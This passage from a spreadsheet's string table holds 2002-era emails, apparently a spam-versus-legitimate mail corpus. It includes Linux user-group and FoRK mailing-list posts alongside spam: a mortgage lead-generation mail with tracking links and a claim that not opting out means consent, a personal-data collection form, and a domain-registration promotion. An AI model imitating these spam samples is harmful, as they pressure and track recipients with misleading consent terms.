             State&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Business 
             Phone&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Home 
             Phone&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Email 
             Address&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;&lt;INPUT type=3Dsubmit value=3D"Submit Information" name=3Dsubmit&gt; 
     &lt;/FORM&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;TABLE width=3D350&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000000 size=3D1&gt;&lt;b&gt;All information g=
 iven herein is strictly confidential and will not be re-distributed
       for any reason other than for the specific use intended.&lt;/font&gt;&lt;/b&gt;&lt;=
 br&gt;
       &lt;FONT face=3D"Arial, Helvetica, sans-serif" color=3D#000000
       size=3D1&gt;To be removed from our distribution lists, please  
       &lt;A href=3D"mailto:inbocks1810@firemail.com?subject=3DRemove_WebC"&gt;Cl=
 ick 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Home Page&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;font color="#000000" face="Arial" size="+0"&gt;&lt;b&gt;&lt;IMG SRC="http://mail4.mortgages101.net/logo.php?id=90&amp;id2=193953"&gt;&lt;/p&gt;
 &lt;p align="center"&gt;If this promotion has reached you in error and you would prefer not to
 receive marketing messages from us, please send an email to&amp;nbsp; &lt;a
 href="mailto:cease-and-desist@mortgages101.net"&gt;cease-and-desist@mortgages101.net&lt;/a&gt;
 &amp;nbsp; (all one word, no spaces) giving us the email address in question or call
 1-888-748-7751 for further assistance.&lt;/p&gt;
 &lt;p align="center"&gt;&lt;u&gt;Gain access to a&lt;/b&gt;&lt;/font&gt;&lt;font size="+1" color="#000000"
 face="Arial"&gt; &lt;i&gt;&lt;b&gt;Vast Network Of Qualified Lenders at Nationwide Network!&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;/u&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font color="#000000" face="Arial"&gt;This is a zero-cost service which
 enables you to shop for a mortgage conveniently from your home computer. &amp;nbsp; Our
 nationwide database will give you access to lenders with a variety of loan programs that
 will work for Excellent, Good, Fair or even Poor Credit! &lt;/font&gt;&lt;br&gt;
 &amp;nbsp; &lt;font face="Arial,Helvetica"&gt;&lt;b&gt;&lt;font color="#000000"&gt;We will choose up to 3 mortgage companies
 from our database of&amp;nbsp; registered brokers/lenders.&lt;/font&gt;&lt;/b&gt; &lt;b&gt;&lt;font
 face="Arial,Helvetica"&gt;Each will contact you to offer you their best rate and terms - at
 no charge.&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &amp;nbsp; &lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;b&gt;&lt;font face="Arial,Helvetica" size="+1" color="#ff0000"&gt;You choose the best
 offer and save - &lt;A HREF="http://mail4.mortgages101.net/point.php?id=90&amp;id2=193953"&gt; Shop here for your next mortgage with just ONE&lt;/font&gt;&lt;font
 face="Arial,Helvetica"&gt;&lt;font color="#ff0000"&gt;&lt;font size="+1"&gt;&lt;font face="Arial,Helvetica"&gt;&lt;/font&gt;
 CLICK - &lt;/A&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt; &lt;br&gt;
 &amp;nbsp; &lt;br&gt;
 &lt;/font&gt;&lt;font face="Arial,Helvetica" size="+0" color="#000000"&gt;&lt;b&gt;Poor or Damaged Credit Is
 Not A Problem!&lt;/b&gt;&lt;/font&gt;&lt;font face="Arial,Helvetica"&gt; &lt;/p&gt;
 &lt;ul&gt;
   &lt;b&gt;&lt;font size="+0"&gt;&lt;font color="#cc3300"&gt;&lt;p align="center"&gt;Consolidate&lt;/font&gt; &amp;amp; pay
   off &lt;font color="#cc3300"&gt;high interest bills&lt;/font&gt; for one lower monthly payment!&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
   &lt;/p&gt;
   &lt;p align="center"&gt;&lt;b&gt;&lt;font size="+0"&gt;&lt;font color="#cc3300"&gt;Refinance&lt;/font&gt; (with or
   without cash out) to a &lt;font color="#cc3300"&gt;low FIXED rate &lt;/font&gt;and payment!&lt;/font&gt;&lt;/b&gt;
   &lt;/p&gt;
   &lt;p align="center"&gt;&lt;b&gt;&lt;font size="+0"&gt;Get money&lt;font color="#cc3300"&gt; &lt;/font&gt;to cover
   expenses for &lt;font color="#cc3300"&gt;tuitions&lt;/font&gt;, &lt;font color="#cc3300"&gt;home
   improvements&lt;/font&gt;, &lt;font color="#cc3300"&gt;a new vehicle or vacations.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;p align="center"&gt;&lt;b&gt;&lt;font size="+0"&gt;- Talk with up to three of our lenders today!
   &lt;A HREF="http://mail4.mortgages101.net/point.php?id=90&amp;id2=193953"&gt;   VISIT OUR SITE HERE!   &lt;/A&gt; to get no-cost rate and payment quotes.&amp;nbsp;
   This service is completely FREE to you!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;/ul&gt;
 &lt;b&gt;&lt;i&gt;&lt;font size="+1"&gt;
 &lt;p align="center"&gt;&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/font&gt;
 &lt;p align="center"&gt;&lt;font face="Arial,Helvetica"&gt;If this promotion has reached you in error
 and you do not want to be contacted by us further, &lt;A HREF="http://mail4.mortgages101.net/optout.php?id=90&amp;id2=193953"&gt;click here&lt;/A&gt; and let us know.&amp;nbsp; You
 will not be bothered by us at this email address again.&amp;nbsp; Alternatively, you may send
 an email to &lt;a href="mailto:cease-and-desist@mortgages101.net"&gt;cease-and-desist@mortgages101.net&lt;/a&gt;
 &amp;nbsp;giving us the email address in question for IMMEDIATE attention.&amp;nbsp; Should you
 wish to delete your email address from our mailing list by phone, please call
 1-888-748-7751 and leave your email address - please spell your email address
 clearly.&amp;nbsp;&amp;nbsp; You may also mail a written request to us at Compliance, NMLN, 3053
 Rancho Vista Blvd. #H-252, Palmdale, CA, 93551.&amp;nbsp; Your request will be honored within
 24 hours of our receipt of your mail.&amp;nbsp; Failure to exclude yourself from our recurring
 mailer via any of the lawful channels provided means that you have given your consent to
 be included in our mailer.&amp;nbsp; You will continue to receive email as long as you do NOT
 delete yourself from our mailer.&amp;nbsp; Please do not continue to receive unwanted email
 after we have provided you with lawful means to be excluded.&amp;nbsp; We log, date and retain
 ALL delete requests.&amp;nbsp; NO PART OF THIS STATEMENT MAY BE AMENDED OR ELIMINATED.&amp;nbsp;
 Thank you.&lt;br&gt;
 &amp;nbsp; &lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 08, 2002 at 12:00:04PM +0100, Padraig Brady wrote:
 &gt; Yes a clever term usually (and deservedly) attributed to perl.
 there's no need for perl to be write only.
 &gt; Of course you can create write-only code in any language.
 &gt; There's even a competition for obfuscated C code which is always
 &gt; worth a look: http://www.es.ioccc.org/main.html
 yes, always fun.  it's a good way to learn the little details of c.
 &gt; p.s. what sort of processing do you do with:
 &gt; kevin+dated+1029235349.f17378@ie.suberic.net
 that's a dated address:
     % tmda-check-address kevin+dated+1029235349.f17378@ie.suberic.net
     STATUS:  VALID
     EXPIRES: Tue Aug 13 10:42:29 2002 UTC
 which means anyone can send email to that address with no problem until
 that date.  after that they have to confirm.  more info can be found
 here: www.tmda.net.
 as an aside, it is possible to filter mail to a mailman mailing list
 with tmda as well.  subscribers can post to the list without a confirm;
 non-subscribers would need to confirm their posts.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</si>
  <si>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&gt;&gt;&gt;&gt;&gt; "R" == Russell Turpin &lt;deafbox@hotmail.com&gt; writes:
     R&gt; Hmm. I've lived most of my life in houses that did not have
     R&gt; central heating, including my current abode.  As to the
     R&gt; crapper, it did not do nearly as much to improve waste
     R&gt; management in cities as did the public sewers which it feeds,
     R&gt; and the water lines that supply it. Without these, you would
     R&gt; find that a chamber pot works just as well.
 The particulars may be negotiable, but even in your list there is not
 one _political_ solution, only technical ones. QED.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">This is the problem, it's not the people who buy the machine that
 end up installing on it.
 We're actually investigating switching from Sparc/Solaris to 
 Intel/Linux. I would much prefer to be using Linux at work
 so I'm pushing for this. It definately doesn't help when 
 you're given a bog standard Dell box and linux won't work
 with the graphics card on it.
 At the moment at work, if we want a new workstation, we just
 buy whatever Sun's latest system is, we jumpstart it, and 
 that's it, it's up and running.
 Basically the whole installation procedure is
 "boot net - install"
 This is exactly what you need when you are administering a large
 group of workstations. You don't have the time to check dells
 website every time you want to buy a machine, you'd spend
 your life on Dells website and messing around with drivers
 and compiling new versions of X. That's fine if you've got
 one machine at home, hey, I've done it myself, but
 when working with a large bunch of systems, it's impossible.
 On Fri, Aug 02, 2002 at 04:02:38AM -0500, Stephen_Reilly@dell.com wrote:
 &gt; &gt; bad thing. Just a bad thing for those that hope a distro will 
 &gt; &gt; work out of
 &gt; &gt; the box.
 &gt; 
 &gt; 	It's still quite easy to find out, pre-purchase, what components if
 &gt; any are going to give you problems with a specific distribution/version.
 &gt; With Dell just check the support.dell.com site, match the system, look for
 &gt; downloadable drivers. From these if there aren't any linux drivers you can
 &gt; usually find out the chipset of each device. Plug them into google with
 &gt; "linux" and see what people have to say about them. Generally speaking when
 &gt; you buy the system you'll be told the make/model of each device rather than
 &gt; the chipset, so further investigation is necessary.
 &gt; 
 &gt; 	The cavaet, of course, is always to know exactly what you're buying.
 &gt; In most people's cases unfortunately it's not the person who bought the
 &gt; systems that will be configuring them.
 &gt; 
 &gt; steve
 &gt; 
 &gt; 
 &gt; -- 
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 &gt; List maintainer: listmaster@linux.ie
 -- 
 ---------------------------------------
 Declan Houlihan
 deccy@csn.ul.ie
 http://deccy.csn.ul.ie/
 ---------------------------------------
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Not Surprised
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Then again, if 57% of CEOs have the time to be as up on technology as
 their CIO, either one or maybe even /both/ of them are maybe not doing
 their job, and maybe that's yet another reason the dot-bubble burst.
 Mind you, I've been head-butting with 'tech-expert' captains (and
 cooks) all my life.  It's probably my own damn fault for making what I
 do /look/ so easy, and also probably why 'metal guitarists grimmace so
 when playing a simple rubato ;)
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-08-14
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Apress Publishes 'Writing Perl Modules for CPAN'
     posted by pudge on Tuesday August 13, @09:50 (books)
     http://use.perl.org/article.pl?sid=02/08/13/1354231
 Lessig's 'Freeing Culture' Keynote Online
     posted by KM on Tuesday August 13, @11:27 (links)
     http://use.perl.org/article.pl?sid=02/08/13/1527257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</si>
  <si>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[ILUG] RE: Newbie Question
</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, the lasat speed basic sucks-ass.com, it won't work coz its from eircon
 who are shite. 
 I have two of em sitting in my drawer of "might have a use some day or
 other"...
 Get yourself an el-cheapo ISDN card, 50 yoyo's will usually suffice. I have
 a TRUST load a crap HFC based one which has been trodding along nicely for
 yonks. Gets detected automagically by pretty much ANY distro, has kernel
 support for a million years or so. 
 Later,
 CW
 p.s.: you other modems are probably winmodems and are a pain in ze arse.com,
 they will work with lots of poking but not worth the effort IMHO. Just use
 ISDN and NAT it.
 -----------------
 Regarding:
 Another problem I have is that I cannot install my ISDN, USB modem ( LASAT
 Speed Basic ), however im pretty sure its not supported by Linux, but again
 it is featured in the Hardware Browser, without installed drivers.
 Thanks for your replies.... However i still cant get it to detect the
 External USB modem. I also have an internal 56k fax modem, but i cannot get
 that detected either ( maybe its because it was designed for Windows and is
 not supported ). Im not going to buy a new modem ( I think 2 is more than
 enough for 1 PC ).
 It could well be my inexperience with Linux that is making this more
 difficult, but whatever it is iv just about had enough!! Any last gasp ideas
 would be welcome
 Many Thanks
 Mark
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 18 Sep 2002, R. A. Hettinga wrote:
 --]I know it's not the popular choice for a lot of people, but I'd
 --]suggest, um, church. :-). Like Woody Allen said, 90% of life is
 --]showing up, right?
 --]
 I think another venue for finding people is the workplace. As a contractor
 I have had the opertunity to meet lots of eligables over the course of my
 wandering workhistory.
 My wife was my Task Order Manager years ago, thats  how we met. Her joke
 is that she is still my Task Order Manager but now I dont get paid:)-
 By starting up your own companies or working in sterile thinklabs you are
 cutting yourself off from one heck of a fertile ground for linkages....the
 common office.
 I like the shurch idea as well. Other ideas...
 Book circles, geocaching groups, heck Rhorho your still young enough to
 hit the campus mixers...and I mean the social stuff not the techtech
 events.
 Above all, ask yourself whats important to you..
 Life, you either life it or you waste it.
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: How about subsidizing SSL access to Google?
</t>
  </si>
  <si>
    <t xml:space="preserve">[a cheeky letter to the editors of the Economist follows, along with the 
 article I was commenting on... Rohit]
 In your article about Chinese attempts to censor Google last week ("The 
 Search Goes On", Sept. 19th), the followup correctly noted that the most 
 subversive aspect of Google's service is not its card catalog, which 
 merely points surfers in the right direction, but the entire library. By 
 maintaining what amounts to a live backup of the entire World Wide Web, 
 if you can get to Google's cache, you can read anything you'd like.
 The techniques Chinese Internet Service Providers are using to enforce 
 these rules, however, all depend on the fact that traffic to and from 
 Google, or indeed almost all public websites, is unencrypted. Almost all 
 Web browsers, however, include support for Secure Sockets Layer (SSL) 
 encryption for securing credit card numbers and the like. Upgrading to 
 SSL makes it effectively impossible for a 'man-in-the-middle' to meddle; 
 censorship would have to be imposed on each individual computer in 
 China. The only choice left is to either ban the entire site (range of 
 IP addresses), but not the kind of selective filtering reported on in 
 the article.
 Of course, the additional computing power to encrypt all this traffic 
 costs real money. If the United States is so concerned about the free 
 flow of information, why shouldn't the Broadcasting Board of Governors 
 sponsor an encrypted interface to Google, or for that matter, the rest 
 of the Web?
 To date, public diplomacy efforts have focused on public-sector 
 programming for the Voice of America, Radio Sawa, and the like. Just 
 imagine if the US government got into the business of subsidizing secure 
 access to private-sector media instead. Nothing illustrates the freedom 
 of the press as much as the wacky excess of the press itself -- and most 
 of it is already salted away at Google and the Internet Archive project.
 On second thought, I can hardly imagine this Administration *promoting* 
 the use of encryption to uphold privacy rights. Never mind...
 Best,
    Rohit Khare
 ===========================================================
 The search goes on
 China backtracks on banning Googleup to a point
 Sep 19th 2002 | BEIJING
  From The Economist print edition
 IN CHINESE, the nickname for Google, an American Internet search engine, 
 is gougou, meaning doggy. For the country's fast-growing population of 
 Internet users (46m, according to an official estimate), it is proving 
 an elusive creature. Earlier this month, the Chinese authorities blocked 
 access to Google from Internet service providers in Chinaapparently 
 because the search engine helped Chinese users to get access to 
 forbidden sites. Now, after an outcry from those users, access has been 
 restored.
 An unusual climbdown by China's zealous Internet censors? Hardly. More 
 sophisticated controls have now been imposed that make it difficult to 
 use Google to search for material deemed offensive to the government. 
 Access is still blocked to the cached versions of web pages taken by 
 Google as it trawls the Internet. These once provided a handy way for 
 Chinese users to see material stored on blocked websites.
 After the blocking of Google on August 31st, many Chinese Internet users 
 posted messages on bulletin boards in China protesting against the move. 
 Their anger was again aroused last week when some Chinese Internet 
 providers began rerouting users trying to reach the blocked Google site 
 to far less powerful search engines in China.
 Duncan Clark, the head of a Beijing-based technology consultancy firm, 
 BDA (China) Ltd, says China is trying a new tactic in its efforts to 
 censor the Internet. Until recently, it had focused on blocking 
 individual sites, including all pages stored on them. Now it seems to be 
 filtering data transmitted to or from foreign websites to search for key 
 words that might indicate undesirable content. For example earlier this 
 week when using Eastnet, a Beijing-based Internet provider, a search on 
 Google for Falun Gonga quasi-Buddhist exercise sect outlawed in China
 usually aborted before all the results had time to appear. Such a search 
 also rendered Google impossible to use for several minutes.
</t>
  </si>
  <si>
    <t xml:space="preserve">Hah.  I guess she doesn't want everyone to know about all the kinky sex 
 she and I have had.  LOL
 C
 On Sat, 7 Sep 2002, Geege Schuman wrote:
 &gt; cdale is a double chocolate chip macadamia to my vanilla wafer.  wait, maybe
 &gt; i'm a ginger snap.
 &gt; 
 &gt; &lt;cough&gt;
 &gt; gg
 &gt; 
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 &gt; Russell Turpin
 &gt; Sent: Saturday, September 07, 2002 11:06 AM
 &gt; To: fork@example.com
 &gt; Subject: Re: Selling Wedded Bliss (was Re: Ouch...)
 &gt; 
 &gt; 
 &gt; Robert Harley:
 &gt; &gt;It is perfectly obvious that (heterosexual) promiscuity is exactly,
 &gt; &gt;precisely identical between males and females.
 &gt; 
 &gt; Yeah, assuming approximately equal populations.
 &gt; But that obscures the different modes of
 &gt; promiscuity. Both the person who gives sex for
 &gt; money or power or companionship and the person
 &gt; who uses money and power and companionship to
 &gt; get sex are promiscuous, in the broadest sense
 &gt; of the word. But their motives and behavior are
 &gt; quite different.
 &gt; 
 &gt; Langur monkeys were the example in the cited
 &gt; article. "Dominant males .. kill babies that
 &gt; are not their own." "The dominant male monkey
 &gt; .. seeks to defend his harem of females." But
 &gt; cozying up to the current dominant male isn't
 &gt; the best strategy for female langurs, because
 &gt; "dominant males are dethroned by rivals every
 &gt; 27 months or so." "By mating with as many
 &gt; extra-group males as possible, female langurs
 &gt; ensure their offspring against infanticide,"
 &gt; by the male who is likely next to rule the
 &gt; roost.
 &gt; 
 &gt; Maybe it's just me, but that doesn't paint a
 &gt; picture of carefree females engaged in joyously
 &gt; promiscuous couplings. The dom cab driver who
 &gt; is taking her two boy toys to New Orleans is a
 &gt; better picture of that. ;-)
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; _________________________________________________________________
 &gt; Chat with friends online, try MSN Messenger: http://messenger.msn.com
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "I read that yesterday..."
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000194.html
 Date: 2002-09-25T22:56:08-08:00
 Matt describes something I've been experiencing a lot recently: You know you 
 read too many primary sources when you read an article on slashdot and think, 
 "I read that yesterday." Yeah, ever since I got into weblogs. I don't rely...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New ccTLD! Get yyyyason.us Before Someone Else Does!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --=appc28ja3p6dz0bmkhsk6b117hp1hf
 Content-Type: text/plain; charset="iso-8859-1"
 Content-transfer-encoding: 8bit
 Dear Justin:
 Register.com is now offering its international business customers 
 .us - America's official Internet address. And when you purchase 
 a .us domain for your business, you get Register.com's Personalized 
 Business Email service for only $9.99 for the first year, a 66% 
 savings!* Click on this link to see if 
 jmason.us**
 is available:
 http://e.register.com/a/tA84nVcAEIqG3AJMQ7eAHmwOoQc/name1?D=jmason
 Every .us Registration Includes:
 * 3-page Web site
 * Web Address Forwarding - forward jmason.us to your current site
 * Online Domain Management - manage all your Web addresses in one place
 * 24/7 Customer Support
 What makes .us unique and why do I need it?
 The .us domain is the only Web country code for the U.S.A. America 
 has more Internet users than any other country - reach American 
 customers with a Web address that speaks to them!    
 An online American identity will be a key contributor to your 
 efforts building and protecting a consistent global brand. Let 
 your prospects know you have an American presence. Request 
 an American identity online at jmason.us for your company. 
 Click on this link to find out more:
 http://e.register.com/a/tA84nVcAEIqG3AJMQ7eAHmwOoQc/name2
 What is the cost?
 America's Internet Address is being offered at special discounts:
 Save More By Adding More Years!
 Register For	  Your Discount***	   You'll Pay
 2 Years                 10%                   $63 
 5 Years                 20%                   $139 
 10 Years                40%                   $209
 Lock-in these introductory .us prices and for a limited 
 time, get an unforgettable .us email address like:
 Justin@jmason.us
 for only $9.99 for the first year.
 Why use a difficult-to-remember email like JohnsConsulting453@aol.com
 or JanesAccounting6782@hotmail.com? Use Invitation Code "EPR76S754" 
 when prompted during registration to receive this special price 
 on email.
 Remember - this is your chance to get jmason.us. 
 Click on the following link and act now - it may not be there tomorrow:
 http://e.register.com/a/tA84nVcAEIqG3AJMQ7eAHmwOoQc/name1?D=jmason
 ********************************************************
 *Register.com's Email Service is only offered in one-year terms.
 **Register.com makes no representations as to whether or not these 
 names infringe or violate any trademark or intellectual property 
 rights. Domain names listed in this offer are subject to availability. 
 You must meet certain eligibility requirements to register a .us domain name.
 ***Discounts are based on com/net/org regular pricing.
 All registrations are subject to the terms of our Services Agreement, 
 located here:
 http://e.register.com/a/tA84nVcAEIqG3AJMQ7eAHmwOoQc/name3
 .US registrations are also subject to the .US Top Level Domain Terms 
 and Conditions, located here:
 http://e.register.com/a/tA84nVcAEIqG3AJMQ7eAHmwOoQc/name4
 To learn more about the disclosure and use of registration information
 in Register.com's published Privacy Notice, please click on this link:
 http://e.register.com/a/tA84nVcAEIqG3AJMQ7eAHmwOoQc/name5
 Our email messages are intended to keep you informed of new 
 promotions as they become available. To UNSUBSCRIBE, please click 
 on the link below, but by doing so, you may miss out on exciting new 
 products and services to come! 
 http://e.register.com/a/tA84nVcAEIqG3AJMQ7eAHmwOoQc/unsub
 2002 Register.com, Inc. All rights reserved. "America's Internet 
 Address" is a trademark of Neustar, Inc.
 --=appc28ja3p6dz0bmkhsk6b117hp1hf
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;.US Email International Business &amp; Email Promotion&lt;/TITLE&gt;
 &lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; charset=3Diso-8859-=
 1"&gt;
 &lt;/HEAD&gt;
 &lt;body BGCOLOR=3D"#FFFFFF" link=3D"#00009C" vlink=3D"#00009C" topmargin=3D"0=
 " leftmargin=3D"0" marginwidth=3D"0" rightmargin=3D"0" bottommargin=3D"0" m=
 arginheight=3D"0"&gt;
 &lt;TABLE WIDTH=3D570 BORDER=3D0 CELLPADDING=3D0 CELLSPACING=3D0&gt;
 &lt;TR&gt;&lt;TD WIDTH=3D"569" HEIGHT=3D"116" COLSPAN=3D"2"&gt;&lt;IMG SRC=3D"http://216.2=
 1.229.207/images/us3_header.gif" ALT=3D"Register.com" WIDTH=3D"569" HEIGHT=
 =3D"116" BORDER=3D"0"&gt;&lt;/TD&gt;&lt;td width=3D"1" bgcolor=3D"#CCCCCC"&gt;&lt;img src=3D"=
 http://216.21.229.207/images/cleardot.gif" width=3D"1"&gt;&lt;/td&gt;&lt;/TR&gt;&lt;TR&gt;&lt;td bg=
 color=3D"#003399" WIDTH=3D"14"&gt;&lt;IMG SRC=3D"http://216.21.229.207/images/cle=
 ardot.gif" WIDTH=3D"14"&gt;&lt;/TD&gt;
 &lt;td bgcolor=3D"#FFFFFF"&gt;
 &lt;table border=3D"0" cellpadding=3D"15"&gt;
 &lt;tr&gt;&lt;td bgcolor=3D"#FFFFFF"&gt;
 &lt;FONT FACE=3D"verdana, arial, helvetica" SIZE=3D3&gt;
 &lt;b&gt;Dear Justin&lt;/b&gt;,&lt;/font&gt;
 &lt;p&gt;
 &lt;FONT FACE=3D"verdana, arial, helvetica" SIZE=3D2&gt;
 &lt;a HREF=3D"http://e.register.com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/name2"&gt;Regis=
 ter.com&lt;/a&gt; is now offering its international business customers &lt;a HREF=3D=
 "http://e.register.com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/name2"&gt;&lt;font color=3D"=
 #0033CC"&gt;&lt;b&gt;.us&lt;/B&gt;&lt;/font&gt;&lt;/A&gt; - America's official Internet address. And w=
 hen you purchase a &lt;a HREF=3D"http://e.register.com/a/hA84nVcAEIqG3AJMQ7eAH=
 mwOoQc/name2"&gt;&lt;font color=3D"#0033CC"&gt;&lt;b&gt;.us&lt;/B&gt;&lt;/font&gt;&lt;/A&gt; domain for your=
  business, you get Register.com's Personalized Business Email service for o=
 nly &lt;b&gt;$9.99&lt;/b&gt; for the first year, a 66% savings!* &lt;/FONT&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/TD&gt;
 &lt;!--right thin rule--&gt;
 &lt;td width=3D"1" bgcolor=3D"#CCCCCC"&gt;&lt;img src=3D"http://216.21.229.207/image=
 s/cleardot.gif" width=3D"1"&gt;&lt;/td&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;td bgcolor=3D"#003399"&gt;&lt;IMG SRC=3D"http://216.21.229.207/images/cleardot.g=
 if" WIDTH=3D14 HEIGHT=3D207&gt;&lt;/TD&gt;=20
 &lt;td width=3D"555"&gt;&lt;form METHOD=3D"get" ACTION=3D"http://e.register.com/a/hA=
 84nVcAEIqG3AJMQ7eAHmwOoQc/form"&gt; &lt;input type=3D"hidden" name=3D"target" val=
 ue=3D"us-consumer"&gt; &lt;input type=3D"hidden" name=3D"tld01" value=3D"us"&gt;&lt;inp=
 ut type=3D"hidden" name=3D"TLDSTRING" value=3D"us"&gt;&lt;input type=3D"hidden" n=
 ame=3D"SRC" value=3D"EPR76S754"&gt;
 &lt;table cellspacing=3D"0" cellpadding=3D"0" border=3D"0" width=3D555&gt;&lt;tr&gt;&lt;td=
  rowspan=3D"2" width=3D"313" height=3D"200"&gt; &lt;a HREF=3D"http://e.register.c=
 om/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/name1?d=3Djmason"&gt;&lt;img src=3D"http://216.2=
 1.229.207/images/box_l3.jpg" width=3D"313" height=3D"200" border=3D"0"&gt;&lt;/a&gt;=
 &lt;/td&gt;&lt;td width=3D"1" height=3D"200" bgcolor=3D"#999999" rowspan=3D"2"&gt;&lt;img =
 src=3D"http://216.21.229.207/images/cleardot.gif" width=3D"1" height=3D"1" =
 &gt; &lt;/TD&gt;
 &lt;td width=3D"241" height=3D"148" valign=3D"top" bgcolor=3D"#FFF5F0"&gt;&lt;a HREF=
 =3D"http://e.register.com/a/hA84nVcAEIqG3AJMQ7eAHmwOoQc/name1?D=3Djmason"&gt;&lt;=
 img src=3D"http://216.21.229.207/images/box_r.gif" width=3D"241" height=3D"=
 148" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/TR&gt;&lt;tr&gt;&lt;td width=3D"241" height=3D"52" bgcolor=
 =3D"#FFF5F0" align=3D"center" valign=3D"middle"&gt; &lt;table cellspacing=3D"0" c=
 ellpadding=3D"0" border=3D"0"&gt; &lt;tr&gt;&lt;td align=3D"left" valign=3D"middle" hei=
